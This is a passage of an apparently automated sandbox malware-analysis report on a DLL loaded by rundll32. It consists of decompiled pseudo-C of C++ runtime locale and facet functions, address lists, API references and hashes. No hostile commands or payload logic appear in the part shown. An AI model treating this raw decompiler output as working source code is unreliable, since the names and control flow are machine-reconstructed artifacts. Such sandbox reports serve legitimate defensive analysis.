							 *(_t682 - 0x10) = _t635;
							 *(_t682 - 4) = 1;
							E6E206FD3(__eflags, _t635);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t635 + 4))))();
							 *0x6e2c6dbc = _t635;
							goto L5;
						}
					} else {
						_t635 = _t651;
						goto L5;
					}
				}
			}

0x6e20f375
0x6e20f375
0x6e20f37c
0x6e20f386
0x6e20f38b
0x6e20f396
0x6e20f39a
0x6e20f39d
0x6e20f3a2
0x6e20f3a6
0x6e20f3ab
0x6e20f3af
0x6e20f3f4
0x6e20f3f7
0x6e20f403
0x6e20f3b1
0x6e20f3b3
0x6e20f3b9
0x6e20f3bf
0x6e20f3c7
0x6e20f3ca
0x6e20f407
0x6e20f415
0x6e20f41a
0x6e20f422
0x6e20f42c
0x6e20f431
0x6e20f43c
0x6e20f440
0x6e20f443
0x6e20f448
0x6e20f451
0x6e20f453
0x6e20f455
0x6e20f49a
0x6e20f49d
0x6e20f4a9
0x6e20f457
0x6e20f457
0x6e20f459
0x6e20f45f
0x6e20f465
0x6e20f46d
0x6e20f470
0x6e20f4ad
0x6e20f4bb
0x6e20f4c0
0x6e20f4c8
0x6e20f4d2
0x6e20f4d7
0x6e20f4e2
0x6e20f4e6
0x6e20f4e9
0x6e20f4ee
0x6e20f4f7
0x6e20f4f9
0x6e20f4fb
0x6e20f540
0x6e20f543
0x6e20f54f
0x6e20f4fd
0x6e20f4fd
0x6e20f4ff
0x6e20f505
0x6e20f50b
0x6e20f513
0x6e20f516
0x6e20f553
0x6e20f561
0x6e20f566
0x6e20f56e
0x6e20f578
0x6e20f57d
0x6e20f588
0x6e20f58c
0x6e20f58f
0x6e20f594
0x6e20f59d
0x6e20f59f
0x6e20f5a1
0x6e20f5e6
0x6e20f5e9
0x6e20f5f5
0x6e20f5a3
0x6e20f5a3
0x6e20f5a5
0x6e20f5ab
0x6e20f5b1
0x6e20f5b9
0x6e20f5bc
0x6e20f5f9
0x6e20f607
0x6e20f60c
0x6e20f614
0x6e20f61e
0x6e20f623
0x6e20f62e
0x6e20f632
0x6e20f635
0x6e20f63a
0x6e20f643
0x6e20f645
0x6e20f647
0x6e20f68c
0x6e20f68f
0x6e20f69b
0x6e20f649
0x6e20f649
0x6e20f64b
0x6e20f651
0x6e20f657
0x6e20f65f
0x6e20f662
0x6e20f69f
0x6e20f6ad
0x6e20f6b2
0x6e20f6ba
0x6e20f6c4
0x6e20f6c9
0x6e20f6d4
0x6e20f6d8
0x6e20f6db
0x6e20f6e0
0x6e20f6e9
0x6e20f6eb
0x6e20f6ed
0x6e20f732
0x6e20f735
0x6e20f741
0x6e20f6ef
0x6e20f6ef
0x6e20f6f1
0x6e20f6f7
0x6e20f6fd
0x6e20f705
0x6e20f708
0x6e20f745
0x6e20f753
0x6e20f758
0x6e20f760
0x6e20f76a
0x6e20f76f
0x6e20f77a
0x6e20f77e
0x6e20f781
0x6e20f786
0x6e20f78f
0x6e20f791
0x6e20f793
0x6e20f7d8
0x6e20f7db
0x6e20f7e7
0x6e20f795
0x6e20f795
0x6e20f797
0x6e20f79d
0x6e20f7a3
0x6e20f7ab
0x6e20f7ae
0x6e20f7eb
0x6e20f7f9
0x6e20f7fe
0x6e20f806
0x6e20f810
0x6e20f815
0x6e20f820
0x6e20f824
0x6e20f827
0x6e20f82c
0x6e20f835
0x6e20f837
0x6e20f839
0x6e20f87e
0x6e20f881
0x6e20f88d
0x6e20f83b
0x6e20f83b
0x6e20f83d
0x6e20f843
0x6e20f849
0x6e20f851
0x6e20f854
0x6e20f891
0x6e20f89f
0x6e20f8a4
0x6e20f8ac
0x6e20f8b6
0x6e20f8bb
0x6e20f8c6
0x6e20f8ca
0x6e20f8cd
0x6e20f8d2
0x6e20f8db
0x6e20f8dd
0x6e20f8df
0x6e20f924
0x6e20f927
0x6e20f933
0x6e20f8e1
0x6e20f8e1
0x6e20f8e3
0x6e20f8e9
0x6e20f8ef
0x6e20f8f7
0x6e20f8fa
0x6e20f937
0x6e20f945
0x6e20f94a
0x6e20f952
0x6e20f95c
0x6e20f961
0x6e20f96c
0x6e20f970
0x6e20f973
0x6e20f978
0x6e20f981
0x6e20f983
0x6e20f985
0x6e20f9ca
0x6e20f9cd
0x6e20f9d9
0x6e20f987
0x6e20f987
0x6e20f989
0x6e20f98f
0x6e20f995
0x6e20f99d
0x6e20f9a0
0x6e20f9dd
0x6e20f9eb
0x6e20f9f0
0x6e20f9f8
0x6e20fa02
0x6e20fa07
0x6e20fa12
0x6e20fa16
0x6e20fa19
0x6e20fa1e
0x6e20fa27
0x6e20fa29
0x6e20fa2b
0x6e20fa70
0x6e20fa73
0x6e20fa7f
0x6e20fa2d
0x6e20fa2d
0x6e20fa2f
0x6e20fa35
0x6e20fa3b
0x6e20fa43
0x6e20fa46
0x6e20fa83
0x6e20fa91
0x6e20fa96
0x6e20fa9e
0x6e20faa8
0x6e20faad
0x6e20fab8
0x6e20fabc
0x6e20fabf
0x6e20fac4
0x6e20facd
0x6e20facf
0x6e20fad1
0x6e20fb16
0x6e20fb19
0x6e20fb25
0x6e20fad3
0x6e20fad3
0x6e20fad5
0x6e20fadb
0x6e20fae1
0x6e20fae9
0x6e20faec
0x6e20fb29
0x6e20fb37
0x6e20fb3c
0x6e20fb44
0x6e20fb4e
0x6e20fb53
0x6e20fb5e
0x6e20fb62
0x6e20fb65
0x6e20fb6a
0x6e20fb73
0x6e20fb75
0x6e20fb77
0x6e20fbbc
0x6e20fbbf
0x6e20fbcb
0x6e20fb79
0x6e20fb79
0x6e20fb7b
0x6e20fb81
0x6e20fb87
0x6e20fb8f
0x6e20fb92
0x6e20fbcf
0x6e20fbdd
0x6e20fbe2
0x6e20fbea
0x6e20fbf4
0x6e20fbf9
0x6e20fc04
0x6e20fc08
0x6e20fc0b
0x6e20fc10
0x6e20fc19
0x6e20fc1b
0x6e20fc1d
0x6e20fc62
0x6e20fc65
0x6e20fc71
0x6e20fc1f
0x6e20fc1f
0x6e20fc21
0x6e20fc27
0x6e20fc2d
0x6e20fc35
0x6e20fc38
0x6e20fc75
0x6e20fc83
0x6e20fc88
0x6e20fc90
0x6e20fc9a
0x6e20fc9f
0x6e20fcaa
0x6e20fcae
0x6e20fcb1
0x6e20fcb6
0x6e20fcbf
0x6e20fcc1
0x6e20fcc3
0x6e20fd08
0x6e20fd0b
0x6e20fd17
0x6e20fcc5
0x6e20fcc5
0x6e20fcc7
0x6e20fccd
0x6e20fcd3
0x6e20fcdb
0x6e20fcde
0x6e20fd18
0x6e20fd1b
0x6e20fd29
0x6e20fd2e
0x6e20fd36
0x6e20fd3b
0x6e20fd3d
0x6e20fd43
0x6e20fd46
0x6e20fd4f
0x6e20fd4f
0x6e20fd4f
0x6e20fd53
0x6e20fd59
0x6e20fd5c
0x6e20fd68
0x6e20fce0
0x6e20fce0
0x6e20fce3
0x6e20fce7
0x6e20fceb
0x6e20fcf8
0x6e20fd00
0x6e20fd02
0x00000000
0x6e20fd02
0x6e20fcc9
0x6e20fcc9
0x00000000
0x6e20fcc9
0x6e20fcc7
0x6e20fc3a
0x6e20fc3a
0x6e20fc3d
0x6e20fc41
0x6e20fc45
0x6e20fc52
0x6e20fc5a
0x6e20fc5c
0x00000000
0x6e20fc5c
0x6e20fc23
0x6e20fc23
0x00000000
0x6e20fc23
0x6e20fc21
0x6e20fb94
0x6e20fb94
0x6e20fb97
0x6e20fb9b
0x6e20fb9f
0x6e20fbac
0x6e20fbb4
0x6e20fbb6
0x00000000
0x6e20fbb6
0x6e20fb7d
0x6e20fb7d
0x00000000
0x6e20fb7d
0x6e20fb7b
0x6e20faee
0x6e20faee
0x6e20faf1
0x6e20faf5
0x6e20faf9
0x6e20fb06
0x6e20fb0e
0x6e20fb10
0x00000000
0x6e20fb10
0x6e20fad7
0x6e20fad7
0x00000000
0x6e20fad7
0x6e20fad5
0x6e20fa48
0x6e20fa48
0x6e20fa4b
0x6e20fa4f
0x6e20fa53
0x6e20fa60
0x6e20fa68
0x6e20fa6a
0x00000000
0x6e20fa6a
0x6e20fa31
0x6e20fa31
0x00000000
0x6e20fa31
0x6e20fa2f
0x6e20f9a2
0x6e20f9a2
0x6e20f9a5
0x6e20f9a9
0x6e20f9ad
0x6e20f9ba
0x6e20f9c2
0x6e20f9c4
0x00000000
0x6e20f9c4
0x6e20f98b
0x6e20f98b
0x00000000
0x6e20f98b
0x6e20f989
0x6e20f8fc
0x6e20f8fc
0x6e20f8ff
0x6e20f903
0x6e20f907
0x6e20f914
0x6e20f91c
0x6e20f91e
0x00000000
0x6e20f91e
0x6e20f8e5
0x6e20f8e5
0x00000000
0x6e20f8e5
0x6e20f8e3
0x6e20f856
0x6e20f856
0x6e20f859
0x6e20f85d
0x6e20f861
0x6e20f86e
0x6e20f876
0x6e20f878
0x00000000
0x6e20f878
0x6e20f83f
0x6e20f83f
0x00000000
0x6e20f83f
0x6e20f83d
0x6e20f7b0
0x6e20f7b0
0x6e20f7b3
0x6e20f7b7
0x6e20f7bb
0x6e20f7c8
0x6e20f7d0
0x6e20f7d2
0x00000000
0x6e20f7d2
0x6e20f799
0x6e20f799
0x00000000
0x6e20f799
0x6e20f797
0x6e20f70a
0x6e20f70a
0x6e20f70d
0x6e20f711
0x6e20f715
0x6e20f722
0x6e20f72a
0x6e20f72c
0x00000000
0x6e20f72c
0x6e20f6f3
0x6e20f6f3
0x00000000
0x6e20f6f3
0x6e20f6f1
0x6e20f664
0x6e20f664
0x6e20f667
0x6e20f66b
0x6e20f66f
0x6e20f67c
0x6e20f684
0x6e20f686
0x00000000
0x6e20f686
0x6e20f64d
0x6e20f64d
0x00000000
0x6e20f64d
0x6e20f64b
0x6e20f5be
0x6e20f5be
0x6e20f5c1
0x6e20f5c5
0x6e20f5c9
0x6e20f5d6
0x6e20f5de
0x6e20f5e0
0x00000000
0x6e20f5e0
0x6e20f5a7
0x6e20f5a7
0x00000000
0x6e20f5a7
0x6e20f5a5
0x6e20f518
0x6e20f518
0x6e20f51b
0x6e20f51f
0x6e20f523
0x6e20f530
0x6e20f538
0x6e20f53a
0x00000000
0x6e20f53a
0x6e20f501
0x6e20f501
0x00000000
0x6e20f501
0x6e20f4ff
0x6e20f472
0x6e20f472
0x6e20f475
0x6e20f479
0x6e20f47d
0x6e20f48a
0x6e20f492
0x6e20f494
0x00000000
0x6e20f494
0x6e20f45b
0x6e20f45b
0x00000000
0x6e20f45b
0x6e20f459
0x6e20f3cc
0x6e20f3cc
0x6e20f3cf
0x6e20f3d3
0x6e20f3d7
0x6e20f3e4
0x6e20f3ec
0x6e20f3ee
0x00000000
0x6e20f3ee
0x6e20f3b5
0x6e20f3b5
0x00000000
0x6e20f3b5
0x6e20f3b3

APIs

__EH_prolog3.LIBCMT ref: 6E20F37C
std::_Lockit::_Lockit.LIBCPMT ref: 6E20F386
int.LIBCPMT ref: 6E20F39D

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E20F3D7
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F3F7
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F415

Strings

pm,n, xrefs: 6E20F391

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: pm,n
API String ID: 651022567-2572091394
Opcode ID: 8a30b9bb76ec5eaa5a37e6aec8e79c23ec760855f3273b040763a584d205b40d
Instruction ID: 4d7e936a3ed2f7f129a1bd50156fb673837000677847a2d41008beb10c35c4f9
Opcode Fuzzy Hash: 8a30b9bb76ec5eaa5a37e6aec8e79c23ec760855f3273b040763a584d205b40d
Instruction Fuzzy Hash: 1811E37590051E8FCF00DBE0C894AEEB77BAF84718F240909E510AB2D0DFB49A45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E2046AB, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E6E2046AB(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t32;
				intOrPtr* _t33;
				void* _t45;
				intOrPtr* _t76;
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr* _t87;
				void* _t88;

				_t62 = __ebx;
				E6E2200AC(0x6e268144, __ebx, __edi, __esi, 0x14);
				E6E206653(_t88 - 0x14, 0);
				 *(_t88 - 4) =  *(_t88 - 4) & 0x00000000;
				_t83 =  *0x6e2dce84; // 0x716070
				 *((intOrPtr*)(_t88 - 0x10)) = _t83;
				_t32 = E6E1E161C(0x6e2dcea8);
				_t65 =  *((intOrPtr*)(_t88 + 8));
				_t33 = E6E1E171B( *((intOrPtr*)(_t88 + 8)), _t32);
				_t86 = _t33;
				if(_t33 != 0) {
					L5:
					E6E2066BA(_t88 - 0x14);
					return E6E220075(_t86);
				} else {
					if(_t83 == 0) {
						_push( *((intOrPtr*)(_t88 + 8)));
						_push(_t88 - 0x10);
						__eflags = E6E204FCE(__ebx, _t65, __edx, _t83, _t86) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t88 - 0x20);
							E6E223D74(_t88 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e26816f, __ebx, _t83, _t86, 0x18);
							E6E206653(_t88 - 0x14, 0);
							 *(_t88 - 4) =  *(_t88 - 4) & 0x00000000;
							_t84 =  *0x6e2dce7c; // 0x719038
							 *((intOrPtr*)(_t88 - 0x10)) = _t84;
							_t45 = E6E1E161C(0x6e2dce90);
							_t72 =  *((intOrPtr*)(_t88 + 8));
							_t87 = E6E1E171B( *((intOrPtr*)(_t88 + 8)), _t45);
							__eflags = _t87;
							if(_t87 != 0) {
								L12:
								E6E2066BA(_t88 - 0x14);
								return E6E220075(_t87);
							} else {
								__eflags = _t84;
								if(_t84 == 0) {
									_push( *((intOrPtr*)(_t88 + 8)));
									_push(_t88 - 0x10);
									__eflags = E6E204F5F(_t62, _t72, __edx, _t84, _t87) - 0xffffffff;
									if(__eflags == 0) {
										_t76 = _t88 - 0x20;
										E6E1E1438(_t76);
										E6E223D74(_t88 - 0x20, 0x6e2c3504);
										asm("int3");
										 *_t76 = __edx;
										return _t76;
									} else {
										_t87 =  *((intOrPtr*)(_t88 - 0x10));
										 *((intOrPtr*)(_t88 - 0x10)) = _t87;
										 *(_t88 - 4) = 1;
										E6E206FD3(__eflags, _t87);
										 *((intOrPtr*)( *_t87 + 4))();
										 *0x6e2dce7c = _t87;
										goto L12;
									}
								} else {
									_t87 = _t84;
									goto L12;
								}
							}
						} else {
							_t86 =  *((intOrPtr*)(_t88 - 0x10));
							 *((intOrPtr*)(_t88 - 0x10)) = _t86;
							 *(_t88 - 4) = 1;
							E6E206FD3(__eflags, _t86);
							 *((intOrPtr*)( *_t86 + 4))();
							 *0x6e2dce84 = _t86;
							goto L5;
						}
					} else {
						_t86 = _t83;
						goto L5;
					}
				}
			}

0x6e2046ab
0x6e2046b2
0x6e2046bc
0x6e2046c1
0x6e2046ca
0x6e2046d0
0x6e2046d3
0x6e2046d8
0x6e2046dc
0x6e2046e1
0x6e2046e5
0x6e204720
0x6e204723
0x6e20472f
0x6e2046e7
0x6e2046e9
0x6e2046ef
0x6e2046f5
0x6e2046fd
0x6e204700
0x6e204733
0x6e204741
0x6e204746
0x6e20474e
0x6e204758
0x6e20475d
0x6e204766
0x6e20476c
0x6e20476f
0x6e204774
0x6e20477d
0x6e20477f
0x6e204781
0x6e2047bc
0x6e2047bf
0x6e2047cb
0x6e204783
0x6e204783
0x6e204785
0x6e20478b
0x6e204791
0x6e204799
0x6e20479c
0x6e2047cc
0x6e2047cf
0x6e2047dd
0x6e2047e2
0x6e2047e3
0x6e2047e7
0x6e20479e
0x6e20479e
0x6e2047a1
0x6e2047a5
0x6e2047a9
0x6e2047b3
0x6e2047b6
0x00000000
0x6e2047b6
0x6e204787
0x6e204787
0x00000000
0x6e204787
0x6e204785
0x6e204702
0x6e204702
0x6e204705
0x6e204709
0x6e20470d
0x6e204717
0x6e20471a
0x00000000
0x6e20471a
0x6e2046eb
0x6e2046eb
0x00000000
0x6e2046eb
0x6e2046e9

APIs

__EH_prolog3.LIBCMT ref: 6E2046B2
std::_Lockit::_Lockit.LIBCPMT ref: 6E2046BC
int.LIBCPMT ref: 6E2046D3

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E20470D
std::_Lockit::~_Lockit.LIBCPMT ref: 6E204723
__CxxThrowException@8.LIBVCRUNTIME ref: 6E204741

Strings

p`q, xrefs: 6E2046CA, 6E20471A

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: p`q
API String ID: 651022567-3914308431
Opcode ID: 5f90f26e08f2838698c0b7c978f986d40517162ec772511e8c5e21d796359592
Instruction ID: 325578467af4ab80f22256d81193297801e9c7faf2b1cfb461339df5bedec8d4
Opcode Fuzzy Hash: 5f90f26e08f2838698c0b7c978f986d40517162ec772511e8c5e21d796359592
Instruction Fuzzy Hash: C211047AE0052E9FCB01DBE0C854AEDB77BBF55715F104A08E510AB2D0EBB49A45C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6E24E506, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 76%

			E6E24E506(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v56;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				signed int _v456;
				short _v458;
				intOrPtr _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v508;
				char _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v556;
				char _v708;
				signed int _v712;
				signed int _v716;
				short _v718;
				signed int* _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v820;
				char _v1248;
				char _v1256;
				intOrPtr _v1276;
				signed int _v1292;
				signed int _t243;
				void* _t246;
				signed int _t249;
				signed int _t251;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t265;
				void* _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t272;
				signed int _t275;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				intOrPtr _t285;
				signed int _t288;
				signed int _t292;
				signed int _t293;
				intOrPtr* _t295;
				intOrPtr _t296;
				signed int _t299;
				signed int _t300;
				signed int _t302;
				signed int _t322;
				signed int _t323;
				signed int _t326;
				signed int _t331;
				void* _t333;
				signed int _t335;
				void* _t336;
				intOrPtr _t337;
				signed int _t342;
				signed int _t343;
				intOrPtr* _t346;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				intOrPtr* _t365;
				signed int _t367;
				signed int _t373;
				intOrPtr* _t377;
				intOrPtr* _t380;
				void* _t383;
				signed int _t384;
				intOrPtr* _t385;
				signed int _t398;
				signed int _t401;
				intOrPtr* _t402;
				signed int _t404;
				signed int* _t408;
				intOrPtr* _t415;
				intOrPtr* _t416;
				intOrPtr _t425;
				signed int _t426;
				short _t427;
				signed int _t430;
				intOrPtr _t431;
				signed int _t434;
				intOrPtr _t435;
				signed int _t437;
				signed int _t440;
				intOrPtr _t446;
				signed int _t447;
				void* _t448;
				signed int _t449;
				signed int _t450;
				signed int _t453;
				signed int _t455;
				void* _t456;
				signed int _t459;
				signed int* _t460;
				intOrPtr* _t461;
				short _t462;
				void* _t464;
				signed int _t466;
				signed int _t468;
				void* _t470;
				void* _t471;
				void* _t473;
				signed int _t474;
				void* _t475;
				void* _t477;
				signed int _t478;
				void* _t480;
				void* _t482;
				intOrPtr _t494;

				_t425 = __edx;
				_t464 = _t470;
				_t471 = _t470 - 0xc;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t360 = E6E24F26D(__ecx, 0x6a6);
				_t242 = 0;
				_pop(_t373);
				if(_t360 == 0) {
					L20:
					return _t242;
				} else {
					_push(__edi);
					_t2 = _t360 + 4; // 0x4
					_t430 = _t2;
					 *_t430 = 0;
					 *_t360 = 1;
					_t446 = _a4;
					_t4 = _t446 + 0x30; // 0x6e24da4e
					_t243 = _t4;
					_push( *_t243);
					_v16 = _t243;
					_push(0x6e270f34);
					_push( *0x6e270dec);
					E6E24E445(_t360, _t373, _t430, _t446, _t430, 0x351, 3);
					_t473 = _t471 + 0x18;
					_v8 = 0x6e270dec;
					while(1) {
						L2:
						_t246 = E6E25D470(_t430, 0x351, 0x6e270f30);
						_t474 = _t473 + 0xc;
						if(_t246 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t415 = _t8;
							_t342 =  *_v16;
							_v16 = _t415;
							_t416 =  *_t415;
							goto L4;
						}
						while(1) {
							L4:
							_t425 =  *_t342;
							if(_t425 !=  *_t416) {
								break;
							}
							if(_t425 == 0) {
								L8:
								_t343 = 0;
							} else {
								_t425 =  *((intOrPtr*)(_t342 + 2));
								if(_t425 !=  *((intOrPtr*)(_t416 + 2))) {
									break;
								} else {
									_t342 = _t342 + 4;
									_t416 = _t416 + 4;
									if(_t425 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							asm("sbb eax, eax");
							_t373 = _v8 + 0xc;
							_v8 = _t373;
							_v12 = _v12 &  !( ~_t343);
							_t346 = _v16;
							_v16 = _t346;
							_push( *_t346);
							_push(0x6e270f34);
							_push( *_t373);
							E6E24E445(_t360, _t373, _t430, _t446, _t430, 0x351, 3);
							_t473 = _t474 + 0x18;
							if(_v8 < 0x6e270e1c) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E6E24CBD3(_t360);
									_t31 = _t446 + 0x28; // 0x10468b00
									_t437 = _t430 | 0xffffffff;
									__eflags =  *_t31;
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											_t32 = _t446 + 0x28; // 0x10468b00
											E6E24CBD3( *_t32);
										}
									}
									_t33 = _t446 + 0x24; // 0x3b8e8
									__eflags =  *_t33;
									if( *_t33 != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t437 == 1;
										if(_t437 == 1) {
											_t34 = _t446 + 0x24; // 0x3b8e8
											E6E24CBD3( *_t34);
										}
									}
									 *(_t446 + 0x24) = 0;
									 *(_t446 + 0x1c) = 0;
									 *(_t446 + 0x28) = 0;
									 *((intOrPtr*)(_t446 + 0x20)) = 0;
									_t39 = _t446 + 0x40; // 0x18914c4
									_t242 =  *_t39;
								} else {
									_t20 = _t446 + 0x28; // 0x10468b00
									_t440 = _t430 | 0xffffffff;
									_t494 =  *_t20;
									if(_t494 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t494 == 0) {
											_t21 = _t446 + 0x28; // 0x10468b00
											E6E24CBD3( *_t21);
										}
									}
									_t22 = _t446 + 0x24; // 0x3b8e8
									if( *_t22 != 0) {
										asm("lock xadd [eax], edi");
										if(_t440 == 1) {
											_t23 = _t446 + 0x24; // 0x3b8e8
											E6E24CBD3( *_t23);
										}
									}
									 *(_t446 + 0x24) =  *(_t446 + 0x24) & 0x00000000;
									_t26 = _t360 + 4; // 0x4
									_t242 = _t26;
									 *(_t446 + 0x1c) =  *(_t446 + 0x1c) & 0x00000000;
									 *(_t446 + 0x28) = _t360;
									 *((intOrPtr*)(_t446 + 0x20)) = _t242;
								}
								goto L20;
							}
							goto L131;
						}
						asm("sbb eax, eax");
						_t343 = _t342 | 0x00000001;
						__eflags = _t343;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6E242188();
					asm("int3");
					_push(_t464);
					_t466 = _t474;
					_t475 = _t474 - 0x1d0;
					_t249 =  *0x6e2c506c; // 0x2b33ced3
					_v56 = _t249 ^ _t466;
					_t251 = _v40;
					_push(_t360);
					_push(_t446);
					_t447 = _v36;
					_push(_t430);
					_t431 = _v44;
					_v508 = _t431;
					__eflags = _t251;
					if(_t251 == 0) {
						_v456 = 1;
						_v468 = 0;
						_t362 = 0;
						_v452 = 0;
						__eflags = _t447;
						if(__eflags == 0) {
							L80:
							E6E24E506(_t362, _t373, _t425, _t431, _t447, __eflags, _t431);
							goto L81;
						} else {
							__eflags =  *_t447 - 0x4c;
							if( *_t447 != 0x4c) {
								L59:
								_t257 = E6E24DE92(_t362, _t425, _t431, _t447, _t447,  &_v276, 0x83,  &_v448, 0x55, 0);
								_t477 = _t475 + 0x18;
								__eflags = _t257;
								if(_t257 != 0) {
									_t373 = 0;
									__eflags = 0;
									_t76 = _t431 + 0x20; // 0x6e24da3e
									_t426 = _t76;
									_t449 = 0;
									_v452 = _t426;
									do {
										__eflags = _t449;
										if(_t449 == 0) {
											L74:
											_t258 = _v456;
										} else {
											_t377 =  *_t426;
											_t259 =  &_v276;
											while(1) {
												__eflags =  *_t259 -  *_t377;
												_t431 = _v464;
												if( *_t259 !=  *_t377) {
													break;
												}
												__eflags =  *_t259;
												if( *_t259 == 0) {
													L67:
													_t373 = 0;
													_t260 = 0;
												} else {
													_t427 =  *((intOrPtr*)(_t259 + 2));
													__eflags = _t427 -  *((intOrPtr*)(_t377 + 2));
													_v458 = _t427;
													_t426 = _v452;
													if(_t427 !=  *((intOrPtr*)(_t377 + 2))) {
														break;
													} else {
														_t259 = _t259 + 4;
														_t377 = _t377 + 4;
														__eflags = _v458;
														if(_v458 != 0) {
															continue;
														} else {
															goto L67;
														}
													}
												}
												L69:
												__eflags = _t260;
												if(_t260 == 0) {
													_t362 = _t362 + 1;
													__eflags = _t362;
													goto L74;
												} else {
													_t261 =  &_v276;
													_push(_t261);
													_push(_t449);
													_push(_t431);
													L84();
													_t426 = _v452;
													_t477 = _t477 + 0xc;
													__eflags = _t261;
													if(_t261 == 0) {
														_t373 = 0;
														_t258 = 0;
														_v456 = 0;
													} else {
														_t362 = _t362 + 1;
														_t373 = 0;
														goto L74;
													}
												}
												goto L75;
											}
											asm("sbb eax, eax");
											_t260 = _t259 | 0x00000001;
											_t373 = 0;
											__eflags = 0;
											goto L69;
										}
										L75:
										_t449 = _t449 + 1;
										_t426 = _t426 + 0x10;
										_v452 = _t426;
										__eflags = _t449 - 5;
									} while (_t449 <= 5);
									__eflags = _t258;
									if(__eflags != 0) {
										goto L80;
									} else {
										__eflags = _t362;
										goto L78;
									}
								}
								goto L81;
							} else {
								__eflags =  *(_t447 + 2) - 0x43;
								if( *(_t447 + 2) != 0x43) {
									goto L59;
								} else {
									__eflags =  *((short*)(_t447 + 4)) - 0x5f;
									if( *((short*)(_t447 + 4)) != 0x5f) {
										goto L59;
									} else {
										while(1) {
											_t263 = E6E25D60D(_t447, 0x6e270f28);
											_t364 = _t263;
											_v472 = _t364;
											_pop(_t379);
											__eflags = _t364;
											if(_t364 == 0) {
												break;
											}
											_t265 = _t263 - _t447;
											__eflags = _t265;
											_v456 = _t265 >> 1;
											if(_t265 == 0) {
												break;
											} else {
												_t267 = 0x3b;
												__eflags =  *_t364 - _t267;
												if( *_t364 == _t267) {
													break;
												} else {
													_t434 = _v456;
													_t365 = 0x6e270dec;
													_v460 = 1;
													do {
														_t268 = E6E24ABBA( *_t365, _t447, _t434);
														_t475 = _t475 + 0xc;
														__eflags = _t268;
														if(_t268 != 0) {
															goto L46;
														} else {
															_t380 =  *_t365;
															_t425 = _t380 + 2;
															do {
																_t337 =  *_t380;
																_t380 = _t380 + 2;
																__eflags = _t337 - _v468;
															} while (_t337 != _v468);
															_t379 = _t380 - _t425 >> 1;
															__eflags = _t434 - _t380 - _t425 >> 1;
															if(_t434 != _t380 - _t425 >> 1) {
																goto L46;
															}
														}
														break;
														L46:
														_v460 = _v460 + 1;
														_t365 = _t365 + 0xc;
														__eflags = _t365 - 0x6e270e1c;
													} while (_t365 <= 0x6e270e1c);
													_t362 = _v472 + 2;
													_t269 = E6E25D5BD(_t379, _t362, 0x6e270f30);
